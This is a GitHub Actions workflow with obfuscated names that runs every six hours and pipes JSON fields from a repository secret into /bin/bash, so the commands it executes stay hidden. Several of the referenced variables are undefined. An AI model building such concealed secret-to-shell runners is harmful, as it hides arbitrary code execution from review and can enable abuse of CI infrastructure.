name: guoshantui4678

on:
  workflow_dispatch:
  schedule:
    - cron: '12 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: guoshantui4678
        env:
          fbg75: ${{ secrets.fbg75 }}
        run: |
          echo $fbg75 | jq -r .bva769 | /bin/bash
          echo $fvoh20406 | jq -r .hml94756 | /bin/bash
          echo $ug93161 | jq -r .jtoqt8 | /bin/bash
          echo $hs894 | jq -r .hh40806 | /bin/bash
          echo $xqors51 | jq -r .e929 | /bin/bash

